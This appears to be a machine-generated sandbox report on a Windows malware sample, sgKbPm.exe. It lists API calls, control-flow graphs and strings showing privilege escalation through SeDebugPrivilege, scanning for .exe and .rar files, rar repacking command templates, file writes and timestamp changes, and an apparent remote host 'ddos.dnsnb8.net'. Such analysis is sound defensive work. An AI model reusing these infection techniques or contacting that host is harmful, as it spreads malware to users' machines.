                                • Part of subcall function 00C529E2: memset.MSVCRT ref: 00C52A44
                                • Part of subcall function 00C529E2: lstrlen.KERNEL32(?), ref: 00C52A54
                                • Part of subcall function 00C529E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00C52A6C
                                • Part of subcall function 00C529E2: strrchr.MSVCRT ref: 00C52A7C
                                • Part of subcall function 00C529E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00C52A9F
                                • Part of subcall function 00C529E2: lstrlen.KERNEL32(Documents and Settings), ref: 00C52AAE
                                • Part of subcall function 00C529E2: memset.MSVCRT ref: 00C52AC6
                                • Part of subcall function 00C529E2: memset.MSVCRT ref: 00C52ADA
                                • Part of subcall function 00C529E2: FindFirstFileA.KERNEL32(?,?), ref: 00C52AEF
                                • Part of subcall function 00C529E2: memset.MSVCRT ref: 00C52B13
                              • strrchr.MSVCRT ref: 00C52959
                              • lstrcmpiA.KERNEL32(00000001,exe), ref: 00C52974
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                              • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                              • API String ID: 3004273771-898104377
                              • Opcode ID: f5721f4b279712247cc141bc3d6ad32ae0de58130eb49b010029ca74b06c7004
                              • Instruction ID: b1e9fa9a3d00cc5f66552dd0fa26d52b14ecde2db4cb1ed16166544bbde66593
                              • Opcode Fuzzy Hash: f5721f4b279712247cc141bc3d6ad32ae0de58130eb49b010029ca74b06c7004
                              • Instruction Fuzzy Hash: E131D57D9003486BDB20A765DC89FCA77EC9B12353F040452FD45A2181E6B49BCC9B68

                              Control-flow Graph

                              APIs
                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00C5164F
                              • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00C5165B
                              • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\sgKbPm.exe,00000104), ref: 00C5166E
                              • CreateThread.KERNEL32(00000000,00000000,00C51099,00000000,00000000,00000000), ref: 00C516AC
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00C516BD
                                • Part of subcall function 00C5139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C513BC
                                • Part of subcall function 00C5139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00C513DA
                                • Part of subcall function 00C5139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00C51448
                              • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C516E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\sgKbPm.exe$C:\Windows\system32$Documents and Settings
                              • API String ID: 123563730-1348673359
                              • Opcode ID: 95b9c147d7e38e3e84a62871e7e64071342e87e3315d1f8c5eb7bb11d1873110
                              • Instruction ID: 1330a20c7c7c7066cc4fe9347a64d1aa9190bf6512dafd0aaaa1603cb0a8ad1b
                              • Opcode Fuzzy Hash: 95b9c147d7e38e3e84a62871e7e64071342e87e3315d1f8c5eb7bb11d1873110
                              • Instruction Fuzzy Hash: CF11B47E5403547BCF2067A49D4DF9F3E6DEB853A7F040011FE09A10A0C67046C8DBA9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 205 c51000-c51023 CreateFileA 206 c51025-c51055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 c51092-c51096 205->207 208 c51057-c5105f 206->208 209 c5107b-c51085 206->209 210 c51074-c51075 UnmapViewOfFile 208->210 211 c51061-c5106e call c517d0 208->211 212 c51087-c5108b CloseHandle 209->212 213 c5108d-c51091 CloseHandle 209->213 210->209 211->210 212->213 213->207
                              APIs
                              • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C51018
                              • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A78400,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C51029
                              • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00C51038
                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C5104B
                              • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C51075
                              • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C5108B
                              • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C5108E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                              • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 1223616889-3273462101
                              • Opcode ID: a2e634237846dce67d7795cec4213e054d2b9cda64f1e0198e337296795a0bf5
                              • Instruction ID: ee74118932ae1f41f8a812560b4e92cd02c0b858ec79473a1825b6cf50666f5b
                              • Opcode Fuzzy Hash: a2e634237846dce67d7795cec4213e054d2b9cda64f1e0198e337296795a0bf5
                              • Instruction Fuzzy Hash: 0001617910039CBFE7306F609C88F2BBBACDB847EAF044529FA55A20D0D6705E848B74

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 375 c52c48-c52c75 memset call c51973 378 c52c77-c52c7f 375->378 379 c52cb2-c52cb9 375->379 380 c52c81-c52c8b 378->380 381 c52c8f-c52cac CreateThread WaitForMultipleObjects 378->381 382 c52cc8-c52ccc 379->382 383 c52cbb-c52cc2 VirtualFree 379->383 380->381 381->379 383->382
                              APIs
                              • memset.MSVCRT ref: 00C52C57
                                • Part of subcall function 00C51973: PathFileExistsA.SHLWAPI(00C54E5C,00000000,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C51992
                                • Part of subcall function 00C51973: CreateFileA.KERNEL32(00C54E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C519BA
                                • Part of subcall function 00C51973: Sleep.KERNEL32(00000064), ref: 00C519C6
                                • Part of subcall function 00C51973: wsprintfA.USER32 ref: 00C519EC
                                • Part of subcall function 00C51973: CopyFileA.KERNEL32(00C54E5C,?,00000000), ref: 00C51A00
                                • Part of subcall function 00C51973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C51A1E
                                • Part of subcall function 00C51973: GetFileSize.KERNEL32(00C54E5C,00000000), ref: 00C51A2C
                                • Part of subcall function 00C51973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C51A46
                                • Part of subcall function 00C51973: ReadFile.KERNEL32(00C54E5C,00C54E60,00000000,?,00000000), ref: 00C51A65
                              • CreateThread.KERNEL32(00000000,00000000,00C52B8C,00000000,00000000,00000000), ref: 00C52C99
                              • WaitForMultipleObjects.KERNEL32(00000001,00C516BA,00000001,000000FF,?,00C516BA,00000000), ref: 00C52CAC
                              • VirtualFree.KERNEL32(00C30000,00000000,00008000,C:\Users\user\AppData\Local\Temp\sgKbPm.exe,00C54E5C,00C54E60,?,00C516BA,00000000), ref: 00C52CC2
                              Strings
                              • C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C52C69
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                              • String ID: C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                              • API String ID: 2042498389-2559047063
                              • Opcode ID: 8692cdef5c9ac906c7518f65b8238f3e48b6d343151e39735a18e19382c33885
                              • Instruction ID: f3dbfb044acb1ddec1aba7b83f902f1fe7016fc8e6172c444737f7117844a30c
                              • Opcode Fuzzy Hash: 8692cdef5c9ac906c7518f65b8238f3e48b6d343151e39735a18e19382c33885
                              • Instruction Fuzzy Hash: CB01D4797013207BE7149794AC0AFDF7EACEF42B66F004020FD15E61C2D5A0AAC8C3A8

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 384 c514e1-c514fb 385 c51541-c51547 384->385 386 c514fd-c51510 GetModuleHandleA 384->386 389 c51573-c51574 call c51638 385->389 390 c51549-c5154c 385->390 387 c51512-c51518 386->387 388 c5151a-c51535 VirtualQuery 386->388 387->385 392 c51537-c51539 388->392 393 c5153b 388->393 396 c51579-c5157a ExitProcess 389->396 394 c5154e-c51555 390->394 395 c51569-c51570 390->395 392->385 392->393 393->385 394->395 397 c51557-c51566 call c51af9 394->397 397->395
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000), ref: 00C51504
                              • VirtualQuery.KERNEL32(00C514E1,?,0000001C), ref: 00C51525
                              • ExitProcess.KERNEL32 ref: 00C5157A
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: ExitHandleModuleProcessQueryVirtual
                              • String ID:
                              • API String ID: 3946701194-0
                              • Opcode ID: 242020f22288ef175cbeec5adffa1db37793563cc6bf1376865ddec8436e4fe2
                              • Instruction ID: 6756646c8b2dc7f8329ff8045a126a0c645890bf16364effa64b52e2cd2cd0fb
                              • Opcode Fuzzy Hash: 242020f22288ef175cbeec5adffa1db37793563cc6bf1376865ddec8436e4fe2
                              • Instruction Fuzzy Hash: 5E115E7D900304DFCB11DFA6E888B7D77B8EB84757B14402AFC12E6150E6708AC5AB54

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 400 c51915-c51922 401 c51924-c51926 400->401 402 c51928-c5192c 400->402 403 c5196e-c51970 401->403 404 c5194f-c51952 402->404 405 c5192e-c5194d memset GetFileTime 402->405 404->403 406 c51954-c51960 SetFileTime 404->406 407 c51966-c51968 405->407 406->407 408 c5196c 407->408 409 c5196a 407->409 408->403 409->408
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: FileTimememset
                              • String ID:
                              • API String ID: 176422537-0
                              • Opcode ID: c8f27013027668aa91356032184b054a38cdbe97a633e57d73f53fa526ac5ec6
                              • Instruction ID: 4ffc9c4ba4cd60b44bf06b8e0dbae8614b6a8cc4dac486b0ea0304dde893c67f
                              • Opcode Fuzzy Hash: c8f27013027668aa91356032184b054a38cdbe97a633e57d73f53fa526ac5ec6
                              • Instruction Fuzzy Hash: ADF0493A100309ABD7209E66DC08BAB77ACAB50362F04853AFD25D1090E770D7C9DBA4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 410 c56158-c56189 VirtualFree 411 c5618c-c56192 410->411 412 c560c7-c560cf 411->412 413 c56198-c561b0 VirtualFree 411->413 412->411 414 c560d5-c560f8 VirtualAlloc 412->414 415 c561b2-c561b4 413->415 416 c561ba-c561c8 413->416 434 c560fe-c56106 414->434 435 c560fa-c560fc call c566c8 414->435 415->416 418 c56243-c56251 416->418 419 c561ca-c561d7 416->419 421 c56264-c5626f 418->421 422 c56253 418->422 423 c561dd-c561e0 419->423 426 c56271-c56276 421->426 425 c56255-c56258 422->425 423->418 427 c561e2-c561f2 423->427 425->421 429 c5625a-c56262 425->429 430 c5627c-c56289 426->430 431 c56389-c563b1 VirtualProtect 426->431 432 c561f5-c561fe 427->432 429->425 447 c56292-c56298 430->447 448 c5628b 430->448 433 c563b7-c563ba 431->433 436 c56200-c56203 432->436 437 c5620c-c56219 432->437 440 c563fc-c56416 VirtualProtect 433->440 441 c563bc-c563c2 433->441 444 c56155-c56189 VirtualFree 434->444 445 c56108-c5611d 434->445 435->434 438 c56205-c56208 436->438 439 c5621b-c56228 436->439 442 c56238-c5623f 437->442 449 c5622a-c56236 438->449 450 c5620a 438->450 439->442 455 c56420-c56425 440->455 456 c56418-c5641d 440->456 441->441 452 c563c4 441->452 442->432 451 c56241 442->451 444->411 454 c5611f-c56121 445->454 457 c562a2-c562ac 447->457 448->447 449->442 450->442 451->423 452->440 458 c563c6-c563cf 452->458 459 c56151-c56154 454->459 460 c56123 454->460 461 c562b1-c562c8 457->461 462 c562ae 457->462 463 c563d4-c563d8 458->463 464 c563d1 458->464 459->444 460->459 465 c56125-c56128 460->465 468 c56373-c56384 461->468 469 c562ce-c562d4 461->469 462->461 470 c563dd-c563e1 463->470 471 c563da 463->471 464->463 466 c56134-c5613b 465->466 467 c5612a-c5612e 465->467 478 c56130-c56132 466->478 479 c5613d-c5614f 466->479 467->466 467->478 468->426 474 c562d6-c562d9 469->474 475 c562da-c562f1 469->475 476 c563e7-c563fa VirtualProtect 470->476 477 c563e3 470->477 471->470 474->475 481 c56365-c5636e 475->481 482 c562f3-c562f9 475->482 476->433 476->440 477->476 478->454 479->454 481->457 483 c56314-c56326 482->483 484 c562fb-c5630f 482->484 486 c5634c-c56360 483->486 487 c56328-c5634a 483->487 485 c56426-c564a9 484->485 496 c56519-c5651c 485->496 497 c564ab-c564c0 485->497 486->485 487->481 499 c56583-c56587 496->499 500 c5651d-c5651e 496->500 502 c56535-c56537 497->502 503 c564c2 497->503 504 c56588-c5658b 499->504 501 c56522-c56533 500->501 501->502 507 c56539 502->507 508 c5659a 502->508 509 c564c5-c564cd 503->509 510 c564f8 503->510 505 c565a1-c565a3 504->505 506 c5658d-c5658f 504->506 511 c56591-c56593 506->511 512 c565b4 507->512 513 c5653b-c56541 507->513 514 c5659b-c5659d 508->514 515 c56542-c56545 509->515 516 c564cf-c564d4 509->516 517 c5656c-c5656f 510->517 518 c564fa-c564fe 510->518 511->514 519 c56595 511->519 524 c565be-c565db 512->524 513->515 514->511 520 c5659f 514->520 521 c5654d-c56550 515->521 522 c56517-c56518 516->522 523 c564d6-c564d9 516->523 525 c56572 517->525 518->525 526 c56500 518->526 519->508 520->504 521->524 527 c56552-c56556 521->527 522->496 523->521 528 c564db-c564f5 523->528 529 c565dd-c565f6 524->529 530 c56573-c56576 525->530 526->501 531 c56502 526->531 532 c56578-c5657a 527->532 533 c56558-c56569 527->533 528->510 534 c565f7-c56608 529->534 530->532 531->530 535 c56504-c56513 531->535 532->529 536 c5657c 532->536 533->517 535->502 537 c56515 535->537 536->534 538 c5657e-c5657f 536->538 537->522 538->499
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00C560DF
                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00C56189
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C561A5
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: Virtual$Free$Alloc
                              • String ID:
                              • API String ID: 1852963964-0
                              • Opcode ID: 3fee98707ba9208734260e689c74ba6419565494e69b6803b995e902e72d14a4
                              • Instruction ID: 95f8c0a2073c35341d8b4d0e8dac84c0782f066fd6b18793c865450186da25e5
                              • Opcode Fuzzy Hash: 3fee98707ba9208734260e689c74ba6419565494e69b6803b995e902e72d14a4
                              • Instruction Fuzzy Hash: 7B116075A00649CFCF318E58CC817EE37A1EF41302F990419DD899B291DA712A88CB98
                              APIs
                              • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\sgKbPm.exe,?,?,?,?,?,?,00C513EF), ref: 00C511AB
                              • OpenProcessToken.ADVAPI32(00000000,00000028,00C513EF,?,?,?,?,?,?,00C513EF), ref: 00C511BB
                              • AdjustTokenPrivileges.ADVAPI32(00C513EF,00000000,?,00000010,00000000,00000000), ref: 00C511EB
                              • CloseHandle.KERNEL32(00C513EF), ref: 00C511FA
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00C513EF), ref: 00C51203
                              Strings
                              • C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C511A5
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                              • String ID: C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                              • API String ID: 75692138-2559047063
                              • Opcode ID: 7c28ec3c2c160cad8abe4aaddb368cd93a13ee62bd2c627041438e4b80f3bc3f
                              • Instruction ID: 8e473353cc793830032cd7f7c818e592cc434b167051c96c1e9fa9d2bf9cd9c9
                              • Opcode Fuzzy Hash: 7c28ec3c2c160cad8abe4aaddb368cd93a13ee62bd2c627041438e4b80f3bc3f
                              • Instruction Fuzzy Hash: 5701E879900349EFDB00DFD4CD89BAEBBB8FB04346F504469E605A2191D7755F849B60
                              APIs
                              • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C513BC
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00C513DA
                              • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00C51448
                                • Part of subcall function 00C5119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\sgKbPm.exe,?,?,?,?,?,?,00C513EF), ref: 00C511AB
                                • Part of subcall function 00C5119F: OpenProcessToken.ADVAPI32(00000000,00000028,00C513EF,?,?,?,?,?,?,00C513EF), ref: 00C511BB
                                • Part of subcall function 00C5119F: AdjustTokenPrivileges.ADVAPI32(00C513EF,00000000,?,00000010,00000000,00000000), ref: 00C511EB
                                • Part of subcall function 00C5119F: CloseHandle.KERNEL32(00C513EF), ref: 00C511FA
                                • Part of subcall function 00C5119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00C513EF), ref: 00C51203
                              Strings
                              • SeDebugPrivilege, xrefs: 00C513D3
                              • C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C513A8
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                              • String ID: C:\Users\user\AppData\Local\Temp\sgKbPm.exe$SeDebugPrivilege
                              • API String ID: 4123949106-2747920968
                              • Opcode ID: c1baffb61098ba19807d66a626bf53a751c185bfa7c8ea462bf9640b857ad3db
                              • Instruction ID: 70e3a20956ffe15cb49e0b97e6d2f2595ea0046c877c38b09629d593799916a2
                              • Opcode Fuzzy Hash: c1baffb61098ba19807d66a626bf53a751c185bfa7c8ea462bf9640b857ad3db
                              • Instruction Fuzzy Hash: C8316379D40209EADF20DBA5CC49FEEBBB8EB84706F184069ED14B2151D7309EC9CB64
                              APIs
                              • strstr.MSVCRT ref: 00C523CC
                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C52464
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00C52472
                              • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00C524A8
                              • memset.MSVCRT ref: 00C524B9
                              • strrchr.MSVCRT ref: 00C524C9
                              • wsprintfA.USER32 ref: 00C524DE
                              • strrchr.MSVCRT ref: 00C524ED
                              • memset.MSVCRT ref: 00C524F2
                              • memset.MSVCRT ref: 00C52505
                              • wsprintfA.USER32 ref: 00C52524
                              • Sleep.KERNEL32(000007D0), ref: 00C52535
                              • Sleep.KERNEL32(000007D0), ref: 00C5255D
                              • memset.MSVCRT ref: 00C5256E
                              • wsprintfA.USER32 ref: 00C52585
                              • memset.MSVCRT ref: 00C525A6
                              • wsprintfA.USER32 ref: 00C525CA
                              • Sleep.KERNEL32(000007D0), ref: 00C525D0
                              • Sleep.KERNEL32(000007D0,?,?), ref: 00C525E5
                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C525FC
                              • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00C52611
                              • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00C52642
                              • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00C5265B
                              • SetEndOfFile.KERNEL32 ref: 00C5266D
                              • CloseHandle.KERNEL32(00000000), ref: 00C52676
                              • RemoveDirectoryA.KERNEL32(?), ref: 00C52681
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                              • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                              • API String ID: 2203340711-2750826870
                              • Opcode ID: 2703be81eb0950b31d07dbad94522eff3921cf203cfbb26ee3809d8bef673bf5
                              • Instruction ID: 024df3cee5307816dd59b707eb3a27437ab5b7ac247ecbb32d6ac3293d77a421
                              • Opcode Fuzzy Hash: 2703be81eb0950b31d07dbad94522eff3921cf203cfbb26ee3809d8bef673bf5
                              • Instruction Fuzzy Hash: 6781C0B9504344ABD7109F60DC89FAFB7ECEB85746F00051AFA84E2191D7709AC98B6A
                              APIs
                              • memset.MSVCRT ref: 00C52766
                              • memset.MSVCRT ref: 00C52774
                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00C52787
                              • wsprintfA.USER32 ref: 00C527AB
                                • Part of subcall function 00C5185B: GetSystemTimeAsFileTime.KERNEL32(00C51F92,00000000,?,00000000,?,?,?,00C51F92,?,00000000,00000002), ref: 00C51867
                                • Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51878
                                • Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51880
                                • Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51890
                                • Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51894
                              • wsprintfA.USER32 ref: 00C527C6
                              • CopyFileA.KERNEL32(?,00C54C80,00000000), ref: 00C527D4
                              • wsprintfA.USER32 ref: 00C527F4
                                • Part of subcall function 00C51973: PathFileExistsA.SHLWAPI(00C54E5C,00000000,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C51992
                                • Part of subcall function 00C51973: CreateFileA.KERNEL32(00C54E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C519BA
                                • Part of subcall function 00C51973: Sleep.KERNEL32(00000064), ref: 00C519C6
                                • Part of subcall function 00C51973: wsprintfA.USER32 ref: 00C519EC
                                • Part of subcall function 00C51973: CopyFileA.KERNEL32(00C54E5C,?,00000000), ref: 00C51A00
                                • Part of subcall function 00C51973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C51A1E
                                • Part of subcall function 00C51973: GetFileSize.KERNEL32(00C54E5C,00000000), ref: 00C51A2C
                                • Part of subcall function 00C51973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C51A46
                                • Part of subcall function 00C51973: ReadFile.KERNEL32(00C54E5C,00C54E60,00000000,?,00000000), ref: 00C51A65
                              • DeleteFileA.KERNEL32(?,?,00C54E54,00C54E58), ref: 00C5281A
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00C54E54,00C54E58), ref: 00C52832
                              Strings
